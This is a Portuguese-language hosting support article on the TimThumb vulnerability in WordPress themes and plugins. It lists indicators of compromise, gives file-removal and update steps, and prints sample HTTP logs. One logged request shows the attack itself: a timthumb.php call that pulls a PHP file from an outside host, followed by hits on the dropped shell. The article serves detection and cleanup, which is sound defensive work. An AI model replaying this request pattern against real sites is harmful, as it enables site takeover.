Comprometimento do WordPress: TimThumb

TimThumb é uma ferramenta usada por WordPress themes e plugins para redimensionar imagens. As versões antigas do TimThumb possuem uma vulnerabilidade de segurança que permite aos invasores carregar arquivos mal-intencionados ("ruins") de outro site. O primeiro arquivo incorreto, então, permite que o invasor carregue mais arquivos maliciosos na conta de hospedagem.

Você pode obter mais informações sobre comprometimentos e sobre como lidar com eles em E se meu site for invadido?.

Sinais de que você está com comprometimento

Além dos sinais mencionados em E se meu site for invadido? , você pode dizer que seu site foi afetado por este comprometimento específico se sua conta contiver os arquivos com os seguintes padrões em um diretório de plugins:

  • external_[md5 hash].php — por exemplo: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — por exemplo: 7eebe45bde5168488ac4010f0d65cea8.php

Você pode encontrar exemplos de possíveis hashes md5 na seção MD5SUMS de arquivos maliciosos conhecidos deste artigo.

Você também pode encontrar os arquivos a seguir em seu diretório-raiz do site (saiba mais):

  • x.txt
  • logx.txt

Correções

Você deve remover todos os arquivos comprometidos e ruins. Antes de excluir alguma coisa, recomendamos que se faça um backup do seu site (saiba mais).

Como localizar arquivos ruins

Os arquivos ruins que inicialmente são carregados através da vulnerabilidade TimThumb normalmente estarão localizados em um dos seguintes diretórios, que estão localizados no diretório /theme ou /plugin , que contém o arquivo vulnerável TimThumb.

  • /tmp
  • /cache
  • /images

Exemplos de locais dos arquivos ruins:

[webroot]/wp-content/themes/[temas com TimThumb vulnerável]/cache/images/

Exemplos de nomes de arquivos ruins nesses locais:

  • ef881b33fba49bd6ad1818062d071a9c.php
  • db648d44074f33a8857066b97290d247.php
  • 3cf739debc9340540c923bbf3b73044b.php
  • dc33a2e36d3179a06278191088c2ef35.php
  • 8377cb73d30655dc2cbf906c9310da56.php
  • eb117b212e2906f52c0a0c9132c6c07a.php
  • a4924ec23939d2410354efbb8d4ddd06.php
  • vvv3.php
  • ea90e1e4d7ba30848f70b13d616c6ed4.php
  • 236268f2a06e4153365b998d13934eb9.php
  • 6a4fa516943e2fa09e3704486075de9f.php
  • 896c4eb4ff2581f6e623db1904b80a44.php
  • wp-images.php

Os arquivos x.txt e logx.txt conterão informações sobre quando um arquivo ruim foi criado usando a vulnerabilidade TimThumb e o local do arquivo incorreto dentro da conta de hospedagem. Esta informação é útil para determinar quais arquivos precisam ser removidos e onde encontrá-los. Entretanto, não é provável que isso forneça uma lista completa de arquivos que precisam ser removidos.

Exemplo:

Dia: Quint., 11 de abril 2013 06:21:15 -0700
IP: X.X.X.X
Navegador: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Url: /wp-content/themes/[tema com TimThumb vulnerável]/cache/images/2817f389ac8b52527a0c5e4aabb464aa.php?clone

Arquivos para remover

Depois de criar um backup do seu site, remova os seguintes arquivos:

  • x.txt
  • logx.txt
  • external_[md5 hash].php — por exemplo: external_dc8e1cb5bf0392f054e59734fa15469b.php
  • [md5 hash].php — por exemplo: 7eebe45bde5168488ac4010f0d65cea8.php
  • Outros arquivos PHP maliciosos foram encontrados com os arquivos nomeados hash md5.

Você pode fazer isso via FTP (mais informações) ou através do gerenciador de arquivos no painel de controle para sua conta de hospedagem ( mais informações ).

Você também deve:

  • Atualizar todos os seus temas e plugins para a versão mais recente.
  • Substituir qualquer instância de TimThumb.php com a versão mais recente encontrada em aqui .

Informações técnicas

Amostra de logs HTTP

x.x.x.x - - [27/Apr/2014:08:04:22 -0700] "GET SampleSite.tld/wp-content/themes/[tema com TimThumb vulnerável]/framework/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.bargainbookfinders.com%2Fsempak.php HTTP/1.1" 200 1018 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.s - - [27/Apr/2014:08:04:23 -0700] "GET SampleSite.tld/wp-content/themes/[tema com TimThumb vulnerável]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php?clone HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:26 -0700] "GET SampleSite.tld/wp-includes/wp-script.php HTTP/1.1" 404 36841 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:28 -0700] "GET SampleSite.tld/wp-content/themes/[tema com TimThumb vulnerável]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
x.x.x.x - - [27/Apr/2014:08:04:30 -0700] "GET SampleSite.tld/wp-content/themes/[tema com TimThumb vulnerável]/cache/images/896c4eb4ff2581f6e623db1904b80a44.php HTTP/1.1" 200 13128 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"

MD5SUMS de arquivos maliciosos conhecidos

  • 2c4bcdc6bee98ed4dd55e0d35564d870
  • 10069c51da0c87ad904d602beb9e7770
  • 8855aecb5c45a5bfd962b4086c8ff96a
  • 526a4cf1f66f27a959a39019fdf1fae9
  • 161d2e53c664bd0fe1303017a145b413
  • 39f186a0f55b04c651cbff6756a64ccc
  • f67ca8f0bac08f5e8ccab6013b7acf70
  • 747c7afcda0eef0eff6ed6838494c32
  • cfdf59a58057b62f4707b909bcbd4577

Arquivos maliciosos adicionais

  • wp-script.php
  • wp-images.php
  • vvv3.php
  • data.php

Este artigo foi útil?
Agradecemos seus comentários. Para falar com um representante do atendimento ao cliente, ligue para o suporte ou utilize a opção de bate-papo acima.
Ficamos felizes em ajudar! Há algo mais que possamos fazer por você?
Mil desculpas. Conte-nos o que estava confuso ou por que a solução não resolveu o seu problema.